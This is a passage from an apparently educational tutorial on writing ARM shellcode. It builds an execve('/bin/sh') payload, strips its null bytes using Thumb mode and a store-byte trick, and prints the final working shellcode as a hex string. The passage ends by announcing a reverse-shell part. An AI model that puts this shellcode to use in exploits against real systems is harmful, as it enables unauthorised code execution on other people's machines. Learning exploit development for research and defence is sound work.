Looking at the output you can see that the syscall number of execve() is 11. Register R0 to R2 can be used for the function parameters and register R7 will store the syscall number.

Invoking system calls on x86 works as follows: First, you PUSH parameters on the stack. Then, the syscall number gets moved into EAX (MOV EAX, syscall_number). And lastly, you invoke the system call with SYSENTER / INT 80.

On ARM, syscall invocation works a little bit differently:

  1. Move parameters into registers – R0, R1, ..
  2. Move the syscall number into register R7
    • mov  r7, #<syscall_number>
  3. Invoke the system call with
    • SVC #0 or
    • SVC #1
  4. The return value ends up in R0

This is how it looks like in ARM Assembly (Code uploaded to the azeria-labs Github account):

As you can see in the picture above, we start with pointing R0 to our “/bin/sh” string by using PC-relative addressing (If you can’t remember why the effective PC starts two instructions ahead of the current one, go to ‘‘Data Types and Registers‘ of the assembly basics tutorial and look at part where the PC register is explained along with an example). Then we move 0’s into R1 and R2 and move the syscall number 11 into R7. Looks easy, right? Let’s look at the disassembly of our first attempt using objdump:

azeria@labs:~$ as execve1.s -o execve1.o
azeria@labs:~$ objdump -d execve1.o
execve1.o: file format elf32-littlearm

Disassembly of section .text:

00000000 <_start>:
 0: e28f000c add r0, pc, #12
 4: e3a01000 mov r1, #0
 8: e3a02000 mov r2, #0
 c: e3a0700b mov r7, #11
 10: ef000000 svc 0x00000000
 14: 6e69622f .word 0x6e69622f
 18: 0068732f .word 0x0068732f

Turns out we have quite a lot of null-bytes in our shellcode. The next step is to de-nullify the shellcode and replace all operations that involve.

3. DE-NULLIFYING SHELLCODE

One of the techniques we can use to make null-bytes less likely to appear in our shellcode is to use Thumb mode. Using Thumb mode decreases the chances of having null-bytes, because Thumb instructions are 2 bytes long instead of 4. If you went through the ARM Assembly Basics tutorials you know how to switch from ARM to Thumb mode. If you haven’t I encourage you to read the chapter about the branching instructions “B / BX / BLX” in part 6 of the tutorial “Conditional Execution and Branching“.

In our second attempt we use Thumb mode and replace the operations containing #0’s with operations that result in 0’s by subtracting registers from each other or xor’ing them. For example, instead of using “mov  r1, #0”, use either “sub  r1, r1, r1” (r1 = r1 – r1) or “eor  r1, r1, r1” (r1 = r1 xor r1). Keep in mind that since we are now using Thumb mode (2 byte instructions) and our code must be 4 byte aligned, we need to add a NOP at the end (e.g. mov  r5, r5).

(Code available on the azeria-labs Github account):

The disassembled code looks like the following:

The result is that we only have one single null-byte that we need to get rid of. The part of our code that’s causing the null-byte is the null-terminated string “/bin/sh\0”. We can solve this issue with the following technique:

  • Replace “/bin/sh\0” with “/bin/shX”
  • Use the instruction strb (store byte) in combination with an existing zero-filled register to replace X with a null-byte

(Code available on the azeria-labs Github account):

Voilà – no null-bytes!

4. TRANSFORM SHELLCODE INTO HEX STRING

The shellcode we created can now be transformed into it’s hexadecimal representation. Before doing that, it is a good idea to check if the shellcode works as a standalone. But there’s a problem: if we compile our assembly file like we would normally do, it won’t work. The reason for this is that we use the strb operation to modify our code section (.text). This requires the code section to be writable and can be achieved by adding the -N flag during the linking process.

azeria@labs:~$ ld --help
--- snip --
-N, --omagic        Do not page align data, do not make text readonly.
--- snip -- 
azeria@labs:~$ as execve3.s -o execve3.o && ld -N execve3.o -o execve3
azeria@labs:~$ ./execve3
$ whoami
azeria

It works! Congratulations, you’ve written your first shellcode in ARM assembly.

To convert it into hex, use the following commands:

azeria@labs:~$ objcopy -O binary execve3 execve3.bin 
azeria@labs:~$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' execve3.bin 
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78

Instead of using the hexdump command above, you also do the same with a simple python script:

#!/usr/bin/env python

import sys

binary = open(sys.argv[1],'rb')

for byte in binary.read():
 sys.stdout.write("\\x"+byte.encode("hex"))

print ""
azeria@labs:~$ ./shellcode.py execve3.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78

I hope you enjoyed this introduction into writing ARM shellcode. In the next part you will learn how to write shellcode in form of a reverse-shell, which is a little bit more complicated than the example above. After that we will dive into memory corruptions and learn how they occur and how to exploit them using our self-made shellcode.